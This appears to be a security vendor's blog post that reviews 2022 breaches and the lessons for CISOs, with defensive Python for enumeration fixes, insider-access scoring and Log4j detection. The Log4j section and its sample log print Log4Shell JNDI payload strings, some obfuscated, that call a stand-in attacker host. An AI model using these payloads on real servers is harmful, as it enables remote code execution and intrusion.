
Lessons that a CISO learned in 2022

Pallavi Vishwakarma
July 12, 2023

The year 2022 was turbulent for cybersecurity around the world. Russia invaded Ukraine, and new incidents and emerging threats unfolded throughout the year. It also brought the first criminal conviction of a corporate security chief for concealing a data breach: Uber's former CSO was found guilty in October 2022 (the sentence, handed down in May 2023, was probation rather than prison). More than 4,100 data breaches were publicly reported, exposing around 22 billion records.

Below are the lessons CISOs can draw from the cyberattacks, threats and data breaches of 2022.

1. Uber: December 2022

Uber was hit twice in a single year: first in September, when an intruder announced in the company's Slack that Uber had suffered a data breach, and again in December, when a hacker stole the data of over 70,000 Uber employees.

On December 12, 2022, Uber confirmed that a hacker using the alias "UberLeaks" had obtained personal information on over 70,000 Uber employees and was publishing it online. Uber attributed the breach to a compromise at Teqtivity, a third-party IT asset management vendor, rather than to a break-in at Uber itself.

The earlier attack came in mid-September, when the intruder posted in the company's Slack workspace, "I am a hacker and Uber has experienced a data breach," followed by a string of emojis. Uber took its internal communications and some engineering systems offline while it investigated.

The hacker also claimed access to numerous internal databases, including ones holding message data. Uber notified law enforcement after determining that the intruder had compromised an external contractor's account. That stands in contrast to the 2016 breach, which Uber concealed from regulators and which ended in litigation and costly penalties.

The lesson for security teams is that security tooling is itself a target. An identity provider, VPN or privileged access system whose own credentials and administrative interfaces are poorly guarded hands an intruder exactly the access it was meant to protect, and can do more harm than good. Security policies need to cover the secrets, admin accounts and management interfaces of the security stack as explicitly as they cover everything else.

2. Twitter confirms data from 5.4 million accounts was stolen: July 2022

In July 2022 a hacker using the handle "devil" announced on the hacking forum BreachForums that they were selling data from 5.4 million Twitter accounts.

The stolen data consisted of email addresses and phone numbers linked to "celebrities, businesses, randoms, and OGs". "OGs" are desirable Twitter handles: short names of one or two letters, or a clean word or first name with no misspellings, numerals or punctuation. The seller said no offers "lower than [$30,000]" would be considered for the database.

The data was harvested through a Twitter vulnerability reported and fixed in January 2022: by submitting an email address or phone number to Twitter's systems, anyone could learn which account it was tied to, even when the owner had hidden that information in their privacy settings. By the time the bug was fixed, the scraping had already taken place.

Two lessons follow. First, a login, account-lookup or password-reset flow that answers differently for registered and unregistered identifiers is an enumeration oracle, and a fix shipped after the bug report does nothing for data that was already scraped; such reports deserve the same urgency as an active intrusion. Second, establishing and enforcing a tight access control policy remains essential against insider threats, backed by thorough background checks and solid references before any new employee is hired.
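As an added example (not code from this page or from Twitter), here is the shape of an enumeration bug like the one described and its fix: an account-recovery lookup that reveals whether an identifier is registered, next to a version that answers identically either way, sends any real notification out of band, and rate-limits each client so bulk scraping becomes expensive. The user store, client identifiers and limits are constructed for illustration.

```python
import secrets
import time
from collections import defaultdict

# Constructed user store: identifier -> handle. Not real accounts.
ACCOUNTS = {
    "alice@example.com": "alice",
    "+15551230000": "alice",
    "bob@example.com": "bob",
}

def vulnerable_lookup(identifier):
    """Recovery endpoint that tells the caller whether an identifier is registered.
    Different status and body for hit vs miss: an enumeration oracle."""
    handle = ACCOUNTS.get(identifier)
    if handle is None:
        return {"status": 404, "body": "No account found for that email or phone number"}
    return {"status": 200, "body": f"Account found: @{handle}"}

class HardenedLookup:
    """Same response whether or not the account exists; the only observable
    effect goes to the account owner out of band; each client is rate-limited."""

    GENERIC = "If that email or phone number is registered, we've sent recovery instructions to it"

    def __init__(self, limit=5, window_seconds=3600):
        self.limit = limit                 # requests per client per window (assumed policy)
        self.window = window_seconds
        self.hits = defaultdict(list)      # client_id -> timestamps of recent requests
        self.outbox = []                   # stands in for the mail/SMS queue

    def lookup(self, identifier, client_id, now=None):
        now = time.time() if now is None else now
        recent = [t for t in self.hits[client_id] if now - t < self.window]
        if len(recent) >= self.limit:
            self.hits[client_id] = recent
            return {"status": 429, "body": "Too many requests; try again later"}
        recent.append(now)
        self.hits[client_id] = recent
        handle = ACCOUNTS.get(identifier)
        if handle is not None:
            # Queue the notification for asynchronous delivery so the caller
            # cannot measure a timing difference between hit and miss.
            self.outbox.append((identifier, handle, secrets.token_urlsafe(16)))
        return {"status": 200, "body": self.GENERIC}

if __name__ == "__main__":
    print(vulnerable_lookup("alice@example.com"), vulnerable_lookup("nobody@example.com"))
    h = HardenedLookup(limit=3)
    print(h.lookup("alice@example.com", "203.0.113.9"), h.lookup("nobody@example.com", "203.0.113.9"))
```

The rate limit alone is not the fix; the uniform response is. A limit only raises the cost of scraping, which matters against a seller working through millions of candidate identifiers, but a single request against the vulnerable endpoint still confirms one account.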

3. Microsoft Data breach: March 2022

Microsoft was targeted by the extortion group Lapsus$ on March 20, 2022. The group posted a screenshot on Telegram claiming to have obtained source code for Bing, Cortana and several other Microsoft services.

Some source code was indeed taken, but by March 22 Microsoft stated that the intrusion had been detected and interrupted quickly, that only a single account had been compromised, and that it does not rely on the secrecy of its code as a security measure.

Microsoft benefited from the attention its strong response drew. Its security team was prepared because Lapsus$ had already hit Nvidia, Samsung and numerous other companies, and Microsoft published an analysis of the group's tactics alongside its own disclosure.

The attack is a good example of the value of educating staff about phishing and other social engineering techniques: Lapsus$ relies on phone-based social engineering, purchased or stolen credentials and MFA prompt bombing far more than on software exploits.

4. Conti Costa Rica Emergency: April 2022

In April, the Russia-linked Conti ransomware gang seriously disrupted financial and government operations across Costa Rica. Its attack on the Ministry of Finance took down the customs and tax systems, paralysing import and export processing. It was the first ransomware attack to prompt the declaration of a national emergency.

According to Bleeping Computer, by May 9 Conti had released about 97% of a 672 GB dump that purportedly contained data taken from government entities. This is the double-extortion model: the gang copies data out before encrypting it, so even after the victim restores from backup or decrypts its systems, the stolen copy still gives the attacker leverage to demand payment.

Attacks on the scale of Costa Rica's will happen again. Failing to prepare is preparing to fail: perform a network security assessment, examine and test the controls you already have to see where they fall short, and look for the weaknesses that are routinely overlooked, such as unmonitored remote access, flat networks and backups an attacker can reach, and fix them.

5. Cash App Data Breach: April 2022

In April 2022 Cash App disclosed that a former employee had downloaded internal reports after leaving the company, using access that should have been revoked on departure. The reports contained customer names, brokerage account numbers and, for some customers, portfolio values, holdings and stock trading activity.

Block, which owns the popular mobile payment app, did not initially say how many people were affected but notified more than 8 million customers. The reports did not include usernames, passwords, Social Security numbers, payment card details or bank account information, so the exposure was limited to brokerage data rather than credentials.

The lesson is an identity-lifecycle one. Offboarding must revoke every access path the moment employment ends, and access and authorization decisions should correlate multiple signals, such as HR status, device posture and behavioral analytics of volume, timing and data touched, so that a still-valid credential alone is not enough to pull a bulk report.
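As an added example, not code from the page or from Block, the following Python correlates the signals just listed into one access decision over a few constructed access-log lines: an HR roster with termination dates, a per-role baseline for how many rows a report normally touches, and a working-hours window. The roster, baselines, thresholds and log format are assumptions for illustration; in a real deployment they would come from the HR system and from historical access data.

```python
from datetime import datetime, timezone

# Constructed HR roster and access-log lines for illustration only; not real data.
ROSTER = {
    "alice": {"status": "active",     "terminated_at": None,                   "role": "support"},
    "bob":   {"status": "terminated", "terminated_at": "2022-04-01T17:00:00Z", "role": "analyst"},
    "dave":  {"status": "active",     "terminated_at": None,                   "role": "analyst"},
}

# Typical rows touched per report action by role (assumed to be learned from history).
BASELINE_ROWS = {"support": 50, "analyst": 5000}
VOLUME_MULTIPLIER = 10            # flag anything over 10x the role baseline (assumption)
WORK_HOURS = range(6, 22)         # UTC hours this team normally works (assumption)
HARD_DENY = {"identity not in HR roster", "access after termination"}

SAMPLE_LOG = [
    "2022-04-02T09:12:03Z alice report_view   customer_profile   rows=12",
    "2022-04-03T02:41:17Z bob   report_export brokerage_accounts rows=8200000",
    "2022-04-03T03:05:44Z dave  report_export brokerage_accounts rows=120000",
    "2022-04-03T11:30:00Z carol report_view   brokerage_accounts rows=3",
]

def _ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def parse_event(line):
    ts, user, action, resource, rows = line.split()
    return {"ts": _ts(ts), "user": user, "action": action,
            "resource": resource, "rows": int(rows.split("=", 1)[1])}

def assess(event, roster=ROSTER):
    """Combine HR status, time of day and data volume into one access decision."""
    reasons = []
    person = roster.get(event["user"])
    if person is None:
        reasons.append("identity not in HR roster")
    elif person["status"] == "terminated" and event["ts"] > _ts(person["terminated_at"]):
        reasons.append("access after termination")
    if event["ts"].hour not in WORK_HOURS:
        reasons.append("off-hours")
    baseline = BASELINE_ROWS.get(person["role"]) if person else None
    if baseline and event["rows"] > VOLUME_MULTIPLIER * baseline:
        reasons.append(f"volume {event['rows'] // baseline}x role baseline")
    if HARD_DENY & set(reasons):
        decision = "deny"
    elif reasons:
        decision = "step-up"      # re-authenticate or require approval before release
    else:
        decision = "allow"
    return {"user": event["user"], "action": event["action"],
            "decision": decision, "reasons": reasons}

def assess_log(lines, roster=ROSTER):
    return [assess(parse_event(line), roster) for line in lines]

if __name__ == "__main__":
    for result in assess_log(SAMPLE_LOG):
        print(result)
```

The point of the design is that the HR signal is a hard stop while the behavioral signals only raise friction: a terminated identity is denied whatever it asks for, whereas an active analyst exporting far more than usual at 03:00 is made to re-authenticate and get approval rather than silently blocked.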

6. Ronin: March 2022

Ronin is the Ethereum sidechain built by Sky Mavis for its play-to-earn game Axie Infinity, which lets players earn digital tokens and NFTs. To keep up with a rapidly growing user base the company relaxed its security precautions, and on March 29, 2022, it disclosed that the Ronin bridge had been drained of roughly $540 million worth of cryptocurrency. The attacker obtained five of the nine validator keys needed to approve a withdrawal: four belonged to Sky Mavis, and the fifth came through an allowlist granted to the company months earlier to cope with load and never revoked. Besides losing the funds, Sky Mavis had to reimburse its users.

Sky Mavis, Ronin's parent company, is working with authorities to identify the culprits and recover funds, but the lesson applies to any business: never compromise your security standards, and treat a temporary exception as a live vulnerability until it is actually removed.

A related lesson from 2022 is that developers and companies should not treat security as a one-size-fits-all setting applied uniformly to every asset or resource. Controls should match the value of what they protect, and concentrated key custody behind a bridge holding hundreds of millions of dollars is not the same risk as a game server.

7. Ukraine war: February 2022

Cyberwarfare is now a standard opening move in modern conflict, taking the form of information manipulation, attacks on infrastructure, election interference and reconnaissance. Years of Russian disinformation and cyberattacks laid the groundwork for the physical war in Ukraine, and as the invasion began, the attacks turned destructive and were aimed at critical services.

Since the war began, Ukraine has launched cyberattacks of its own. It organized a volunteer "IT Army" that works from a published list of Russian target hostnames and IP addresses, and the campaign has produced data breaches and service outages inside Russia, often through distributed denial of service (DDoS) attacks.

Don't wait for a cyberwar between nations with strong offensive teams to find out whether your company's security posture can withstand common threats and attacks; test it against them now.

8. Log4j crisis: January 2022

Log4j is a Java logging library embedded in countless business systems and web applications, whatever Java's declining consumer appeal might suggest. When the Log4Shell flaw (CVE-2021-44228) was disclosed in December 2021, researchers told WIRED they expected many popular services to be affected, and the clean-up ran well into 2022.

Hundreds of millions of devices were affected by Log4Shell, which was rightly treated as a serious technological emergency that attackers around the world would almost certainly exploit.

Exploiting it takes nothing more than getting a crafted string such as ${jndi:ldap://attacker.example/x} into any input the application eventually logs: a user agent, a username, a chat message. Vulnerable Log4j 2 releases (2.0-beta9 through 2.14.1) resolve the lookup, connect to the attacker's server and load whatever Java class it returns, giving the attacker code execution on the server. Payloads were quickly obfuscated with nested lookups such as ${${lower:j}ndi:...} to slip past naive string matching. The JNDI lookup was disabled by default in 2.16.0, and removing the JndiLookup class from the jar is the documented mitigation for installations that cannot be upgraded.
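The detection side of that paragraph, as an added example that is not part of the original page: a small Python detector that resolves the nesting tricks (${lower:...}, ${upper:...}, ${::-x} and missing-variable defaults) the way Log4j itself would, undoes URL encoding, and then looks for the jndi lookup, run over a few constructed access-log lines. The log lines, addresses and payloads are made up for the example.

```python
import re
import urllib.parse

# Log4j lookups that Log4Shell payloads nest around the "jndi" token to evade
# naive "${jndi:" matching. Innermost lookups resolve first, as in Log4j.
_LOOKUP = re.compile(r"\$\{(?P<name>[^${}:]*):(?P<arg>[^${}]*)\}")

def _resolve_lookup(m):
    name = m.group("name").strip().lower()
    arg = m.group("arg")
    if name == "jndi":
        return m.group(0)          # keep it: this is what we are hunting for
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    # Any other lookup (env, sys, date, the empty name in "${::-x}", ...) is
    # assumed not to resolve on the target, so Log4j falls back to the
    # ":-default" value if one is given; that is the classic way to smuggle
    # single characters past a filter.
    if ":-" in arg:
        return arg.split(":-", 1)[1]
    return m.group(0)

def normalize(line):
    """Undo URL encoding and collapse nested lookups until nothing changes."""
    text = urllib.parse.unquote(line)
    for _ in range(16):            # bounded: real payloads nest a few levels deep
        new = _LOOKUP.sub(_resolve_lookup, text)
        if new == text:
            break
        text = new
    return text

def is_log4shell_probe(line):
    return "${jndi:" in normalize(line).lower()

def scan(lines):
    """Return 1-based indexes of lines carrying a JNDI lookup payload."""
    return [i for i, line in enumerate(lines, start=1) if is_log4shell_probe(line)]

# Constructed access-log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:01:22 +0000] "GET /login HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.4/x}"',
    '10.0.0.9 - - [10/Dec/2021:12:02:40 +0000] "GET /?q=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.4%2Fx%7D HTTP/1.1" 200 "-" "curl/7.79"',
    '10.0.0.3 - - [10/Dec/2021:12:03:00 +0000] "GET / HTTP/1.1" 200 "-" "${env:HOME} is not a jndi lookup"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print(f"line {i}: {normalize(SAMPLE_LOG[i - 1])}")
```

A match in a web log only proves that somebody probed the host, which during December 2021 was everyone; the value of normalizing the payload is that the ldap/rmi address it resolves to tells you which callback server to look for in outbound connection logs, which is what turns a probe into a confirmed compromise.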

The incident forced organizations to ask why they did not know where the library was running. Understanding your attack surface, and keeping security top of mind across the whole organization, is the difference between a day of patching and weeks of searching. Companies began putting more effort into tracking the open-source software they use, having seen the damage that comes from blind trust in the origin and quality of their dependencies.
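Knowing where the library runs is the concrete form of "understanding your attack surface". As an added example (not code from the page or from the Log4j project), here is a Python scanner that walks a directory tree, opens every jar, war, ear or zip, recurses into archives nested inside them (Spring Boot fat jars, WEB-INF/lib), reads the log4j-core version from its Maven pom.properties and checks whether JndiLookup.class is still present. It classifies each hit against the release that disabled JNDI on its line (2.16.0, or 2.12.2 and 2.3.1 on the Java 7 and Java 6 lines). The fixture jars it scans are constructed in a temporary directory, not real artifacts.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

def _version_tuple(version):
    parts = []
    for piece in version.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())   # "1-rc1" -> 1
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)

def _jndi_removed_since(vt):
    """First release on each 2.x line that disabled the JNDI lookup."""
    if vt[:2] == (2, 3):
        return (2, 3, 1)        # Java 6 line
    if vt[:2] == (2, 12):
        return (2, 12, 2)       # Java 7 line
    return (2, 16, 0)

def classify(version, has_jndi_class):
    if not has_jndi_class:
        return "mitigated"      # JndiLookup.class stripped from the jar
    if version is None:
        return "vulnerable"     # cannot prove otherwise: treat unknown as vulnerable
    vt = _version_tuple(version)
    return "vulnerable" if vt < _jndi_removed_since(vt) else "patched"

def _scan_zip(zf, display_path, findings):
    names = set(zf.namelist())
    if POM_PROPERTIES in names or JNDI_LOOKUP_CLASS in names:
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        findings.append({"path": display_path, "version": version,
                         "jndi_lookup_present": JNDI_LOOKUP_CLASS in names,
                         "status": classify(version, JNDI_LOOKUP_CLASS in names)})
    # Recurse into nested archives (WAR/EAR bundles, Spring Boot fat jars).
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            with inner:
                _scan_zip(inner, f"{display_path}!{name}", findings)

def scan_path(root):
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                zf = zipfile.ZipFile(path)
            except zipfile.BadZipFile:
                continue
            with zf:
                _scan_zip(zf, str(path), findings)
    return findings

def _fake_log4j_core(version, with_jndi_class=True):
    """Build a minimal jar that looks like log4j-core to the scanner (constructed fixture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi_class:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
    return buf.getvalue()

def build_fixtures(root):
    lib = Path(root) / "app" / "lib"
    lib.mkdir(parents=True, exist_ok=True)
    (lib / "log4j-core-2.14.1.jar").write_bytes(_fake_log4j_core("2.14.1"))
    (lib / "log4j-core-2.14.1-stripped.jar").write_bytes(_fake_log4j_core("2.14.1", with_jndi_class=False))
    with zipfile.ZipFile(lib / "commons-io-2.11.0.jar", "w") as zf:
        zf.writestr("org/apache/commons/io/IOUtils.class", b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(Path(root) / "app" / "webapp.war", "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", _fake_log4j_core("2.17.1"))

def demo():
    """Scan a constructed tree and return {jar basename: status}."""
    with tempfile.TemporaryDirectory() as root:
        build_fixtures(root)
        return {os.path.basename(f["path"]): f["status"] for f in scan_path(root)}

if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:11} {name}")
```

Note that a scanner like this only finds what is on disk; a shaded or renamed copy of the library, or one pulled in at runtime, needs a software bill of materials from the build, which is the "keep track of open-source software" lesson in practice.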

9. Crypto.com Breach: January 2022

The attack, which hit the cryptocurrency wallets of roughly 500 users, took place on January 17. In total the thieves took about $18 million in Bitcoin, $15 million in Ether and smaller amounts of other currencies. It was possible because the attackers were able to get past two-factor authentication: withdrawals were approved without the 2FA control being triggered. A password manager would not have helped here; the lesson is that 2FA on its own is not a sufficient control around high-value actions. Crypto.com afterwards migrated to a new 2FA infrastructure and introduced a mandatory 24-hour delay before a newly added withdrawal address can be used.

Blockchain transaction processing has long been regarded as one of the most secure models, but that reputation covers the ledger, not the exchanges and wallets built on top of it, and attackers keep going after the account controls and key custody around crypto transactions.

Crypto.com initially described the event merely as an "incident", but later withdrew that characterization, admitting that funds had been taken and stating that affected users had been reimbursed. The company added that it had reviewed its systems and worked to strengthen its security posture.

Attacks that ride on unauthorized access show how fragile a castle-and-moat network model is. The model to implement is zero trust, in which no user, device or session is presumed trustworthy whether inside or outside the network, and every sensitive action is verified again.

10. Red Cross: January 2022

It seems unlikely that anyone would wish to attack the Red Cross, but someone did in January 2022. An attack on a third-party contractor exposed the personal data of more than 500,000 people, including records the Red Cross described as belonging to "highly vulnerable" individuals.

Thousands of people had their private information taken, many of them missing persons, detainees and people separated from their families who were already in danger. The Red Cross took the affected servers offline to contain the attack and investigate what appeared to be a politically motivated breach, but no attribution has been made.

Transparency has consistently been central to the Red Cross's response to data breaches. It protects the organization's reputation while giving the affected individuals what they need to protect themselves.

11. Healthcare: A Continued Top Target

Healthcare providers were attacked throughout the year. Criminals have targeted them for a long time because of the variety of valuable data they handle and retain, and the stakes have risen as these attacks pay off for cybercriminals in several ways at once: ransom, resale of records and downstream fraud.

Some of the attacks are:

Over the summer, Baptist Health System in Texas disclosed a significant security lapse that exposed a large volume of confidential patient information.

On October 25, 2022, the Australian health insurer Medibank disclosed that data on over 4 million of its customers had been compromised. Names, addresses, dates of birth and even insurance card numbers might have been accessed, the company said.

Later in the year an incident in which an employee improperly accessed an electronic health records (EHR) system came to light, underscoring the danger of insider threats.

Because they are such a target, healthcare institutions need more stringent controls. The toolkit must include properly configured firewalls, anti-malware, encryption of data at rest and in transit, and, given the insider case above, access logging and regular review of who is opening which records in the EHR system.

Conclusion

These and other incidents changed the corporate environment and forced CISOs to navigate choppy waters. The lessons are to keep closer track of the open-source software in use, to maintain an up-to-date security posture, and to increase the security budget accordingly.

One of the most important lessons of the year is that a purely reactive approach to cybersecurity can slow down or jeopardize a business's competitiveness, financial position and market growth.

SecOps Solution is an award-winning agent-less Full-stack Vulnerability and Patch Management Platform that helps organizations identify, prioritize and remediate security vulnerabilities and misconfigurations in seconds.
